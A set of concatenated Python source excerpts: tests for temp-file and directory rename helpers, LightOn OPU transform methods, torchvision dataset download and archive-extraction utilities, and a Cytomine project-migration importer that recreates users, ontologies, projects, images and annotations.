self.assertEqual("world_ro", in_f.read())
with open(td / "hello_rw") as in_f:
self.assertEqual("world_rw -- appended", in_f.read())
def _check_has_one_file(self, dir_path, filename, contents):
self.assertEqual([filename.encode()], os.listdir(dir_path))
with open(dir_path / filename) as in_f:
self.assertEqual(contents, in_f.read())
def test_populate_temp_dir_and_rename(self):
with temp_dir() as td:
# Create and populate "foo"
foo_path = td / "foo"
with populate_temp_dir_and_rename(foo_path) as td2:
self.assertTrue(td2.startswith(td + b"/"))
self.assertEqual(td2, td / td2.basename())
self.assertNotEqual(td2.basename(), Path("foo"))
with create_ro(td2 / "hello", "w") as out_f:
out_f.write("world")
self._check_has_one_file(foo_path, "hello", "world")
# Fail to overwrite
with self.assertRaises(OSError) as ctx:
with populate_temp_dir_and_rename(foo_path):
pass # Try to overwrite with empty.
# Different kernels return different error codes :/
self.assertIn(ctx.exception.errno, [errno.ENOTEMPTY, errno.EEXIST])
self._check_has_one_file(foo_path, "hello", "world") # No change
# Force-overwrite
with populate_temp_dir_and_rename(foo_path, overwrite=True) as td2:
with create_ro(td2 / "farewell", "w") as out_f:
out_f.write("arms")
self._check_has_one_file(foo_path, "farewell", "arms")
def test_populate_temp_file_and_rename_success(self):
with temp_dir() as td:
path = td / "dog"
with populate_temp_file_and_rename(path) as outfile:
outfile.write("woof")
tmp_path = outfile.name
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# Ensure that file exists and contains correct content
self.assertTrue(os.path.exists(path))
self.assertEqual(path.read_text(), "woof")
def test_populate_temp_file_fail_to_overwrite(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
# Fail to write due to existing file
with self.assertRaises(FileExistsError):
with populate_temp_file_and_rename(path) as outfile:
outfile.write("meow")
tmp_path = outfile.name
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# Original file is untouched
self.assertEqual(path.read_text(), "woof")
def test_populate_temp_file_force_overwrite(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
# Succeeds in overwriting contents in "dog"
with populate_temp_file_and_rename(path, overwrite=True) as outfile:
outfile.write("meow")
tmp_path = outfile.name
# Temp file should no longer exist (as it has been renamed)
self.assertFalse(os.path.exists(tmp_path))
# Original file is modified
self.assertEqual(path.read_text(), "meow")
def test_populate_temp_file_and_rename_error(self):
with temp_dir() as td:
path = td / "dog"
with open(path, "w") as outfile:
outfile.write("woof")
with self.assertRaisesRegex(RuntimeError, "^woops$"):
with populate_temp_file_and_rename(path) as outfile:
outfile.write("meow")
tmp_path = outfile.name
raise RuntimeError("woops")
# Temp file should be deleted
self.assertFalse(os.path.exists(tmp_path))
# the original file is untouched
self.assertEqual(path.read_text(), "woof")
def test_unlink(self):
with temp_dir() as td:
| |
nonlinear random projections of one or several input vectors.
The `fit1d` or `fit2d` method must be called before, for setting vector dimensions
or online option.
If you need to transform one vector after each other, add `online=True` in the fit function.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoder.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before transform"
assert self.device.active, "OPU device isn't active, use opu.open() or \"with opu:\""
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, self._runner.traits)
self._debug(str(user_input))
if user_input.is_batch and not self._s.simulated:
# With batch input start acquisition first
assert self.device.acq_state.value != AcqState.online.value, \
"Can't transform a batch of vectors when acquisition is" \
" in online mode, only single vectors"
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
out = self._runner.transform(user_input)
else:
out = self._runner.transform(user_input)
return self._post_transform(out, user_input, encoder, decoder_cls)
def linear_transform(self, X, encoder_cls=NoEncoding, decoder_cls=NoDecoding) -> TransformOutput:
"""
Do a linear transform of X, for Nitro (non-linear) photonic cores.
Parameters
----------
X: np.ndarray or torch.Tensor
input vector, or batch of input vectors.
Each vector must have the same dimensions as the one given in `fit1d` or `fit2d`.
encoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transform the input into binary vectors to be processed by the opu.
decoder_cls: encoding.base.BaseTransformer, optional
class or instance of class that transforms the output of the opu back into the appropriate format.
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if traits.packed:
# TODO implement for packed
raise RuntimeError("Linear transform isn't yet implemented for packed input :/")
if inspect.isclass(encoder_cls):
encoder = encoder_cls()
else:
encoder = encoder_cls
X_enc = encoder.transform(X)
user_input = OpuUserInput.from_traits(X_enc, traits)
_, result_ctx = self._raw_linear_transform(X_enc, traits, user_input)
# Decoding, add context, and optional convert back to torch if needed
output = self._post_transform(result_ctx, user_input, encoder, decoder_cls)
# Rescale the output, intentionally after the decoding step
if self.rescale is OutputRescaling.variance:
n_features = user_input.n_features_s
output = output / (self._s.stdev * sqrt(n_features))
elif self.rescale is OutputRescaling.norm:
output = output / (self._s.stdev * sqrt(self.n_components))
return output
def transform1d(self, *args, **kwargs):
raise RuntimeError("transform1d is deprecated, you must now use fit1d and transform")
def transform2d(self, *args, **kwargs):
raise RuntimeError("transform2d is deprecated, you must now use fit2d and transform")
def fit_transform1d(self, X, packed: bool = False,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 1d input vector(s).
This function is the one-liner equivalent of `fit1d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit1d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
The input data can be bit-packed, where ``n_features = 8*X.shape[-1]``
Otherwise ``n_features = X.shape[-1]``
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 1d input vector, or batch of 1d input_vectors, binary encoded, packed or not
batch can be 1d or 2d. In all cases ``output.shape[:-1] = X.shape[:-1]``
packed: bool, optional
whether the input data is in bit-packed representation
defaults to False
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit1d(X, None, packed, False, **override)
return self.transform(X)
def fit_transform2d(self, X, packed: bool = False, n_2d_features=None,
**override) -> ContextArray:
"""Performs the nonlinear random projections of 2d input vector(s).
This function is the one-liner equivalent of `fit2d` and `transform` calls.
.. warning:: when making several transform calls, prefer calling `fit2d`
and then `transform`, or you might encounter an inconsistency in the
transformation matrix.
If tqdm module is available, it is used for progress display
Parameters
----------
X: np.ndarray or torch.Tensor
a 2d input vector, or batch of 2d input_vectors, binary encoded, packed or not
packed: bool, optional
whether the input data is in bit-packed representation
if True, each input vector is assumed to be a 1d array, and the "real" number
of features must be provided as n_2d_features
defaults to False
n_2d_features: list, tuple or np.ndarray of length 2
If the input is bit-packed, specifies the shape of each input vector.
Not needed if the input isn't bit-packed.
override: keyword args for overriding transform settings (advanced parameters)
Returns
-------
Y: np.ndarray or torch.Tensor
complete array of nonlinear random projections of X,
of size self.n_components
If input is an ndarray, type is actually ContextArray,
with a context attribute to add metadata
"""
self.fit2d(X, n_2d_features, packed, False, **override)
return self.transform(X)
def __fit(self, X, n_features: IntOrTuple,
packed: bool, online: bool, is_2d_features: bool,
**override):
"""Internal working of the fitXd calls
Instantiates a TransformRunner, and start online acq if needs be.
"""
if X is not None:
# Input is provided, do the fit with user input
user_input = OpuUserInput.from_input(X, packed, is_2d_features, n_features)
tr_settings = self._tr_settings(no_input=False, **override)
self._runner = FitTransformRunner(self._s, tr_settings, user_input,
device=self.device,
disable_pbar=self.disable_pbar)
else:
# Only dimensions are provided, no fitting happens on input
assert n_features, "either input vector or n_features must be specified"
# tr_settings has no input_roi, since it uses X to compute it
tr_settings = self._tr_settings(no_input=True, **override)
traits = InputTraits(n_features, packed)
self._runner = TransformRunner(self._s, tr_settings, traits,
device=self.device,
disable_pbar=self.disable_pbar)
self._acq_stack.close()
if online:
if self._s.no_single_transform:
raise RuntimeError("Online transform isn't available with this OPU")
# Start acquisition only if online. Batch transform start their own.
self._acq_stack.enter_context(self.device.acquiring(online=True))
@staticmethod
def _post_transform(output, user_input, encoder, decoder_cls):
"""Final steps after transform
1. reshape
2. decode the output
3. convert to tensor if user input was tensor
"""
output = user_input.reshape_output(output)
# If encoder has get_params method, it's for transmitting it to decoder init
if inspect.isclass(decoder_cls):
if hasattr(encoder, "get_params"):
decoder = decoder_cls(**encoder.get_params())
else:
decoder = decoder_cls()
else:
decoder = decoder_cls
output = decoder.transform(output)
if user_input.is_tensor:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch
return torch.from_numpy(output)
else:
return output
def _raw_linear_transform(self, X, traits=None, user_input=None):
"""
Do linear_transform of X, and return both raw OPU output and decoded output in a tuple
"""
if traits is None:
assert self._runner, "Call fit1d or fit2d before linear_transform"
traits = self._runner.traits
if user_input is None:
user_input = OpuUserInput.from_traits(X, traits)
if self._s.simulated:
prepared_X = X
else:
assert self.device.acq_state.value != AcqState.online.value, \
"Can't do linear transform when acquisition is" \
" in online mode, only single vectors"
assert self._runner.t.input_roi_strategy == InputRoiStrategy.full, \
"ROI strategy must be full for linear_transform to be correct.\n" \
"Set input_roi_strategy attribute to InputRoiStrategy.full."
# X2 is now numpy 2D, whatever the initial shape and the type (torch or numpy)
X2 = user_input.reshape_input(raveled_features=True, leave_single_dim=True)
try:
import lightonopu.linear_reconstruction as reconstruction
except ImportError:
raise RuntimeError("Need a lightonopu version with linear_reconstruction module")
start = time.time()
prepared_X = reconstruction.encode_batch(X2)
self._trace(f"Encoding time {time.time() - start} s")
# Restore the dimension after batch encoding to something suitable for formatting
prepared_X = user_input.unravel_features(prepared_X)
# Run the OPU transform
prepared_input = OpuUserInput.from_traits(prepared_X, traits)
start = time.time()
with self.device.acquiring(n_images=self._s.n_samples_by_pass):
rp_opu = self._runner.transform(prepared_input, linear=True)
self._trace(f"Transform time {time.time() - start} s")
if self._s.simulated:
result_ctx = rp_opu
else:
# Decoding forgets about the context, re-add it to result afterwards
start = time.time()
result = reconstruction.decode_batch(rp_opu)
self._trace(f"Decoding time {time.time() - start} s")
result_ctx = ContextArray(result, rp_opu.context)
return rp_opu, result_ctx
def | |
<reponame>Gaurav7888/vision
import os
import os.path
import hashlib
import gzip
import re
import tarfile
from typing import Any, Callable, List, Iterable, Optional, TypeVar, Dict, IO, Tuple
from urllib.parse import urlparse
import zipfile
import lzma
import contextlib
import urllib
import urllib.request
import urllib.error
import pathlib
import torch
from torch.utils.model_zoo import tqdm
from ._utils import (
_download_file_from_remote_location,
_is_remote_location_available,
)
USER_AGENT = "pytorch/vision"
def _urlretrieve(url: str, filename: str, chunk_size: int = 1024) -> None:
with open(filename, "wb") as fh:
with urllib.request.urlopen(urllib.request.Request(url, headers={"User-Agent": USER_AGENT})) as response:
with tqdm(total=response.length) as pbar:
for chunk in iter(lambda: response.read(chunk_size), ""):
if not chunk:
break
pbar.update(chunk_size)
fh.write(chunk)
def gen_bar_updater() -> Callable[[int, int, int], None]:
pbar = tqdm(total=None)
def bar_update(count, block_size, total_size):
if pbar.total is None and total_size:
pbar.total = total_size
progress_bytes = count * block_size
pbar.update(progress_bytes - pbar.n)
return bar_update
def calculate_md5(fpath: str, chunk_size: int = 1024 * 1024) -> str:
md5 = hashlib.md5()
with open(fpath, 'rb') as f:
for chunk in iter(lambda: f.read(chunk_size), b''):
md5.update(chunk)
return md5.hexdigest()
def check_md5(fpath: str, md5: str, **kwargs: Any) -> bool:
return md5 == calculate_md5(fpath, **kwargs)
def check_integrity(fpath: str, md5: Optional[str] = None) -> bool:
if not os.path.isfile(fpath):
return False
if md5 is None:
return True
return check_md5(fpath, md5)
def _get_redirect_url(url: str, max_hops: int = 3) -> str:
initial_url = url
headers = {"Method": "HEAD", "User-Agent": USER_AGENT}
for _ in range(max_hops + 1):
with urllib.request.urlopen(urllib.request.Request(url, headers=headers)) as response:
if response.url == url or response.url is None:
return url
url = response.url
else:
raise RecursionError(
f"Request to {initial_url} exceeded {max_hops} redirects. The last redirect points to {url}."
)
def _get_google_drive_file_id(url: str) -> Optional[str]:
parts = urlparse(url)
if re.match(r"(drive|docs)[.]google[.]com", parts.netloc) is None:
return None
match = re.match(r"/file/d/(?P<id>[^/]*)", parts.path)
if match is None:
return None
return match.group("id")
def download_url(
url: str, root: str, filename: Optional[str] = None, md5: Optional[str] = None, max_redirect_hops: int = 3
) -> None:
"""Download a file from a url and place it in root.
Args:
url (str): URL to download file from
root (str): Directory to place downloaded file in
filename (str, optional): Name to save the file under. If None, use the basename of the URL
md5 (str, optional): MD5 checksum of the download. If None, do not check
max_redirect_hops (int, optional): Maximum number of redirect hops allowed
"""
root = os.path.expanduser(root)
if not filename:
filename = os.path.basename(url)
fpath = os.path.join(root, filename)
os.makedirs(root, exist_ok=True)
# check if file is already present locally
if check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
return
if _is_remote_location_available():
_download_file_from_remote_location(fpath, url)
else:
# expand redirect chain if needed
url = _get_redirect_url(url, max_hops=max_redirect_hops)
# check if file is located on Google Drive
file_id = _get_google_drive_file_id(url)
if file_id is not None:
return download_file_from_google_drive(file_id, root, filename, md5)
# download the file
try:
print('Downloading ' + url + ' to ' + fpath)
_urlretrieve(url, fpath)
except (urllib.error.URLError, IOError) as e: # type: ignore[attr-defined]
if url[:5] == 'https':
url = url.replace('https:', 'http:')
print('Failed download. Trying https -> http instead.'
' Downloading ' + url + ' to ' + fpath)
_urlretrieve(url, fpath)
else:
raise e
# check integrity of downloaded file
if not check_integrity(fpath, md5):
raise RuntimeError("File not found or corrupted.")
def list_dir(root: str, prefix: bool = False) -> List[str]:
"""List all directories at a given root
Args:
root (str): Path to directory whose folders need to be listed
prefix (bool, optional): If true, prepends the path to each result, otherwise
only returns the name of the directories found
"""
root = os.path.expanduser(root)
directories = [p for p in os.listdir(root) if os.path.isdir(os.path.join(root, p))]
if prefix is True:
directories = [os.path.join(root, d) for d in directories]
return directories
def list_files(root: str, suffix: str, prefix: bool = False) -> List[str]:
"""List all files ending with a suffix at a given root
Args:
root (str): Path to directory whose folders need to be listed
suffix (str or tuple): Suffix of the files to match, e.g. '.png' or ('.jpg', '.png').
It uses the Python "str.endswith" method and is passed directly
prefix (bool, optional): If true, prepends the path to each result, otherwise
only returns the name of the files found
"""
root = os.path.expanduser(root)
files = [p for p in os.listdir(root) if os.path.isfile(os.path.join(root, p)) and p.endswith(suffix)]
if prefix is True:
files = [os.path.join(root, d) for d in files]
return files
def _quota_exceeded(response: "requests.models.Response") -> bool: # type: ignore[name-defined]
try:
start = next(response.iter_content(chunk_size=128, decode_unicode=True))
return isinstance(start, str) and "Google Drive - Quota exceeded" in start
except StopIteration:
return False
def download_file_from_google_drive(file_id: str, root: str, filename: Optional[str] = None, md5: Optional[str] = None):
"""Download a Google Drive file from and place it in root.
Args:
file_id (str): id of file to be downloaded
root (str): Directory to place downloaded file in
filename (str, optional): Name to save the file under. If None, use the id of the file.
md5 (str, optional): MD5 checksum of the download. If None, do not check
"""
# Based on https://stackoverflow.com/questions/38511444/python-download-files-from-google-drive-using-url
import requests
url = "https://docs.google.com/uc?export=download"
root = os.path.expanduser(root)
if not filename:
filename = file_id
fpath = os.path.join(root, filename)
os.makedirs(root, exist_ok=True)
if os.path.isfile(fpath) and check_integrity(fpath, md5):
print('Using downloaded and verified file: ' + fpath)
else:
session = requests.Session()
response = session.get(url, params={'id': file_id}, stream=True)
token = _get_confirm_token(response)
if token:
params = {'id': file_id, 'confirm': token}
response = session.get(url, params=params, stream=True)
if _quota_exceeded(response):
msg = (
f"The daily quota of the file {filename} is exceeded and it "
f"can't be downloaded. This is a limitation of Google Drive "
f"and can only be overcome by trying again later."
)
raise RuntimeError(msg)
_save_response_content(response, fpath)
def _get_confirm_token(response: "requests.models.Response") -> Optional[str]: # type: ignore[name-defined]
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def _save_response_content(
response: "requests.models.Response", destination: str, chunk_size: int = 32768, # type: ignore[name-defined]
) -> None:
with open(destination, "wb") as f:
pbar = tqdm(total=None)
progress = 0
for chunk in response.iter_content(chunk_size):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
progress += len(chunk)
pbar.update(progress - pbar.n)
pbar.close()
def _extract_tar(from_path: str, to_path: str, compression: Optional[str]) -> None:
with tarfile.open(from_path, f"r:{compression[1:]}" if compression else "r") as tar:
tar.extractall(to_path)
_ZIP_COMPRESSION_MAP: Dict[str, int] = {
".xz": zipfile.ZIP_LZMA,
}
def _extract_zip(from_path: str, to_path: str, compression: Optional[str]) -> None:
with zipfile.ZipFile(
from_path, "r", compression=_ZIP_COMPRESSION_MAP[compression] if compression else zipfile.ZIP_STORED
) as zip:
zip.extractall(to_path)
_ARCHIVE_EXTRACTORS: Dict[str, Callable[[str, str, Optional[str]], None]] = {
".tar": _extract_tar,
".zip": _extract_zip,
}
_COMPRESSED_FILE_OPENERS: Dict[str, Callable[..., IO]] = {".gz": gzip.open, ".xz": lzma.open}
_FILE_TYPE_ALIASES: Dict[str, Tuple[Optional[str], Optional[str]]] = {".tgz": (".tar", ".gz")}
def _verify_archive_type(archive_type: str) -> None:
if archive_type not in _ARCHIVE_EXTRACTORS.keys():
valid_types = "', '".join(_ARCHIVE_EXTRACTORS.keys())
raise RuntimeError(f"Unknown archive type '{archive_type}'. Known archive types are '{valid_types}'.")
def _verify_compression(compression: str) -> None:
if compression not in _COMPRESSED_FILE_OPENERS.keys():
valid_types = "', '".join(_COMPRESSED_FILE_OPENERS.keys())
raise RuntimeError(f"Unknown compression '{compression}'. Known compressions are '{valid_types}'.")
def _detect_file_type(file: str) -> Tuple[str, Optional[str], Optional[str]]:
path = pathlib.Path(file)
suffix = path.suffix
suffixes = pathlib.Path(file).suffixes
if not suffixes:
raise RuntimeError(
f"File '{file}' has no suffixes that could be used to detect the archive type and compression."
)
elif len(suffixes) > 2:
raise RuntimeError(
"Archive type and compression detection only works for 1 or 2 suffixes. " f"Got {len(suffixes)} instead."
)
elif len(suffixes) == 2:
# if we have exactly two suffixes we assume the first one is the archive type and the second on is the
# compression
archive_type, compression = suffixes
_verify_archive_type(archive_type)
_verify_compression(compression)
return "".join(suffixes), archive_type, compression
# check if the suffix is a known alias
with contextlib.suppress(KeyError):
return (suffix, *_FILE_TYPE_ALIASES[suffix])
# check if the suffix is an archive type
with contextlib.suppress(RuntimeError):
_verify_archive_type(suffix)
return suffix, suffix, None
# check if the suffix is a compression
with contextlib.suppress(RuntimeError):
_verify_compression(suffix)
return suffix, None, suffix
raise RuntimeError(f"Suffix '{suffix}' is neither recognized as archive type nor as compression.")
def _decompress(from_path: str, to_path: Optional[str] = None, remove_finished: bool = False) -> str:
r"""Decompress a file.
The compression is automatically detected from the file name.
Args:
from_path (str): Path to the file to be decompressed.
to_path (str): Path to the decompressed file. If omitted, ``from_path`` without compression extension is used.
remove_finished (bool): If ``True``, remove the file after the extraction.
Returns:
(str): Path to the decompressed file.
"""
suffix, archive_type, compression = _detect_file_type(from_path)
if not compression:
raise RuntimeError(f"Couldn't detect | |
<filename>cytomineprojectmigrator/importer.py
# -*- coding: utf-8 -*-
# * Copyright (c) 2009-2019. Authors: see NOTICE file.
# *
# * Licensed under the Apache License, Version 2.0 (the "License");
# * you may not use this file except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import copy
import json
import os
import logging
import random
import shutil
import string
import sys
import tarfile
import time
from argparse import ArgumentParser
import requests
from cytomine import Cytomine
from cytomine.models import OntologyCollection, TermCollection, User, RelationTerm, ProjectCollection, \
StorageCollection, AbstractImageCollection, ImageInstance, ImageInstanceCollection, AbstractImage, UserCollection, \
Ontology, Project, Term, AnnotationCollection, Annotation, Property, Model, AttachedFile, Description
from joblib import Parallel, delayed
__author__ = "<NAME> <<EMAIL>>"
def find_first(l):
return l[0] if len(l) > 0 else None
def random_string(length=10):
return ''.join(random.choice(string.ascii_letters) for _ in range(length))
def connect_as(user=None, open_admin_session=False):
public_key = None
private_key = None
if hasattr(user, "publicKey") and user.publicKey:
public_key = user.publicKey
if hasattr(user, "privateKey") and user.privateKey:
private_key = user.privateKey
if not public_key or not private_key:
keys = user.keys()
public_key, private_key = keys["publicKey"], keys["privateKey"]
Cytomine.get_instance().set_credentials(public_key, private_key)
if open_admin_session:
Cytomine.get_instance().open_admin_session()
return Cytomine.get_instance().current_user
class Importer:
def __init__(self, host_upload, working_path, with_original_date=False):
self.host_upload = host_upload
self.with_original_date = with_original_date
self.id_mapping = {}
self.working_path = working_path
self.with_userannotations = False
self.with_images = False
self.super_admin = None
def run(self):
self.super_admin = Cytomine.get_instance().current_user
connect_as(self.super_admin, True)
users = UserCollection().fetch()
users_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("user-collection")][0]
remote_users = UserCollection()
for u in json.load(open(os.path.join(self.working_path, users_json))):
remote_users.append(User().populate(u))
roles = ["project_manager", "project_contributor", "ontology_creator"]
if self.with_images:
roles += ["image_creator", "image_reviewer"]
if self.with_userannotations:
roles += ["userannotation_creator", "userannotationterm_creator"]
roles = set(roles)
remote_users = [u for u in remote_users if len(roles.intersection(set(u.roles))) > 0]
for remote_user in remote_users:
user = find_first([u for u in users if u.username == remote_user.username])
if not user:
user = copy.copy(remote_user)
if not user.password:
user.password = <PASSWORD>)
if not self.with_original_date:
user.created = None
user.updated = None
user.save()
self.id_mapping[remote_user.id] = user.id
# --------------------------------------------------------------------------------------------------------------
logging.info("1/ Import ontology and terms")
"""
Import the ontology with terms and relation terms that are stored in pickled files in working_path.
If the ontology exists (same name and same terms), the existing one is used.
Otherwise, an ontology with an available name is created with new terms and corresponding relationships.
"""
ontologies = OntologyCollection().fetch()
ontology_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("ontology")][0]
remote_ontology = Ontology().populate(json.load(open(os.path.join(self.working_path, ontology_json))))
remote_ontology.name = remote_ontology.name.strip()
terms = TermCollection().fetch()
terms_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("term-collection")]
remote_terms = TermCollection()
if len(terms_json) > 0:
for t in json.load(open(os.path.join(self.working_path, terms_json[0]))):
remote_terms.append(Term().populate(t))
def ontology_exists():
compatible_ontology = find_first([o for o in ontologies if o.name == remote_ontology.name.strip()])
if compatible_ontology:
set1 = set((t.name, t.color) for t in terms if t.ontology == compatible_ontology.id)
difference = [term for term in remote_terms if (term.name, term.color) not in set1]
if len(difference) == 0:
return True, compatible_ontology
return False, None
else:
return True, None
i = 1
remote_name = remote_ontology.name
found, existing_ontology = ontology_exists()
while not found:
remote_ontology.name = "{} ({})".format(remote_name, i)
found, existing_ontology = ontology_exists()
i += 1
# SWITCH to ontology creator user
connect_as(User().fetch(self.id_mapping[remote_ontology.user]))
if not existing_ontology:
ontology = copy.copy(remote_ontology)
ontology.user = self.id_mapping[remote_ontology.user]
if not self.with_original_date:
ontology.created = None
ontology.updated = None
ontology.save()
self.id_mapping[remote_ontology.id] = ontology.id
logging.info("Ontology imported: {}".format(ontology))
for remote_term in remote_terms:
logging.info("Importing term: {}".format(remote_term))
term = copy.copy(remote_term)
term.ontology = self.id_mapping[term.ontology]
term.parent = None
if not self.with_original_date:
term.created = None
term.updated = None
term.save()
self.id_mapping[remote_term.id] = term.id
logging.info("Term imported: {}".format(term))
remote_relation_terms = [(term.parent, term.id) for term in remote_terms]
for relation in remote_relation_terms:
parent, child = relation
if parent:
rt = RelationTerm(self.id_mapping[parent], self.id_mapping[child]).save()
logging.info("Relation term imported: {}".format(rt))
else:
self.id_mapping[remote_ontology.id] = existing_ontology.id
ontology_terms = [t for t in terms if t.ontology == existing_ontology.id]
for remote_term in remote_terms:
self.id_mapping[remote_term.id] = find_first([t for t in ontology_terms if t.name == remote_term.name]).id
logging.info("Ontology already encoded: {}".format(existing_ontology))
# SWITCH USER
connect_as(self.super_admin, True)
# --------------------------------------------------------------------------------------------------------------
logging.info("2/ Import project")
"""
Import the project (i.e. the Cytomine Project domain) stored in pickled file in working_path.
If a project with the same name already exists, append a (x) suffix where x is an increasing number.
"""
projects = ProjectCollection().fetch()
project_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("project")][0]
remote_project = Project().populate(json.load(open(os.path.join(self.working_path, project_json))))
remote_project.name = remote_project.name.strip()
def available_name():
i = 1
existing_names = [o.name for o in projects]
new_name = project.name
while new_name in existing_names:
new_name = "{} ({})".format(project.name, i)
i += 1
return new_name
project = copy.copy(remote_project)
project.name = available_name()
project.discipline = None
project.ontology = self.id_mapping[project.ontology]
project_contributors = [u for u in remote_users if "project_contributor" in u.roles]
project.users = [self.id_mapping[u.id] for u in project_contributors]
project_managers = [u for u in remote_users if "project_manager" in u.roles]
project.admins = [self.id_mapping[u.id] for u in project_managers]
if not self.with_original_date:
project.created = None
project.updated = None
project.save()
self.id_mapping[remote_project.id] = project.id
logging.info("Project imported: {}".format(project))
# --------------------------------------------------------------------------------------------------------------
logging.info("3/ Import images")
storages = StorageCollection().fetch()
abstract_images = AbstractImageCollection().fetch()
images_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("imageinstance-collection")]
remote_images = ImageInstanceCollection()
if len(images_json) > 0:
for i in json.load(open(os.path.join(self.working_path, images_json[0]))):
remote_images.append(ImageInstance().populate(i))
remote_images_dict = {}
for remote_image in remote_images:
image = copy.copy(remote_image)
# Fix old image name due to urllib3 limitation
remote_image.originalFilename = bytes(remote_image.originalFilename, 'utf-8').decode('ascii', 'ignore')
if remote_image.originalFilename not in remote_images_dict.keys():
remote_images_dict[remote_image.originalFilename] = [remote_image]
else:
remote_images_dict[remote_image.originalFilename].append(remote_image)
logging.info("Importing image: {}".format(remote_image))
# SWITCH user to image creator user
connect_as(User().fetch(self.id_mapping[remote_image.user]))
# Get its storage
storage = find_first([s for s in storages if s.user == Cytomine.get_instance().current_user.id])
if not storage:
storage = storages[0]
# Check if image is already in its storage
abstract_image = find_first([ai for ai in abstract_images
if ai.originalFilename == remote_image.originalFilename
and ai.width == remote_image.width
and ai.height == remote_image.height
and ai.resolution == remote_image.resolution])
if abstract_image:
logging.info("== Found corresponding abstract image. Linking to project.")
ImageInstance(abstract_image.id, self.id_mapping[remote_project.id]).save()
else:
logging.info("== New image starting to upload & deploy")
filename = os.path.join(self.working_path, "images", image.originalFilename.replace("/", "-"))
Cytomine.get_instance().upload_image(self.host_upload, filename, storage.id,
self.id_mapping[remote_project.id])
time.sleep(0.8)
# SWITCH USER
connect_as(self.super_admin, True)
# Waiting for all images...
n_new_images = -1
new_images = None
count = 0
while n_new_images != len(remote_images) and count < len(remote_images) * 5:
new_images = ImageInstanceCollection().fetch_with_filter("project", self.id_mapping[remote_project.id])
n_new_images = len(new_images)
if count > 0:
time.sleep(5)
count = count + 1
print("All images have been deployed. Fixing image-instances...")
# Fix image instances meta-data:
for new_image in new_images:
remote_image = remote_images_dict[new_image.originalFilename].pop()
if self.with_original_date:
new_image.created = remote_image.created
new_image.updated = remote_image.updated
new_image.reviewStart = remote_image.reviewStart if hasattr(remote_image, 'reviewStart') else None
new_image.reviewStop = remote_image.reviewStop if hasattr(remote_image, 'reviewStop') else None
new_image.reviewUser = self.id_mapping[remote_image.reviewUser] if hasattr(remote_image, 'reviewUser') and remote_image.reviewUser else None
new_image.instanceFilename = remote_image.instanceFilename
new_image.update()
self.id_mapping[remote_image.id] = new_image.id
self.id_mapping[remote_image.baseImage] = new_image.baseImage
new_abstract = AbstractImage().fetch(new_image.baseImage)
if self.with_original_date:
new_abstract.created = remote_image.created
new_abstract.updated = remote_image.updated
if new_abstract.resolution is None:
new_abstract.resolution = remote_image.resolution
if new_abstract.magnification is None:
new_abstract.magnification = remote_image.magnification
new_abstract.update()
print("All image-instances have been fixed.")
# --------------------------------------------------------------------------------------------------------------
logging.info("4/ Import user annotations")
annots_json = [f for f in os.listdir(self.working_path) if f.endswith(".json") and f.startswith("user-annotation-collection")]
remote_annots = AnnotationCollection()
if len(annots_json) > 0:
for a in json.load(open(os.path.join(self.working_path, annots_json[0]))):
remote_annots.append(Annotation().populate(a))
def _add_annotation(remote_annotation, id_mapping, with_original_date):
if remote_annotation.project not in id_mapping.keys() \
or remote_annotation.image not in id_mapping.keys():
return
annotation = copy.copy(remote_annotation)
annotation.project = id_mapping[remote_annotation.project]
annotation.image = id_mapping[remote_annotation.image]
annotation.user = id_mapping[remote_annotation.user]
annotation.term = [id_mapping[t] for t in remote_annotation.term]
if not with_original_date:
annotation.created = None
annotation.updated = None
annotation.save()
for user in [u for u in remote_users if "userannotation_creator" in u.roles]:
remote_annots_for_user = [a for a in remote_annots if a.user == user.id]
# SWITCH to annotation creator user
connect_as(User().fetch(self.id_mapping[user.id]))
Parallel(n_jobs=-1, backend="threading")(delayed(_add_annotation)
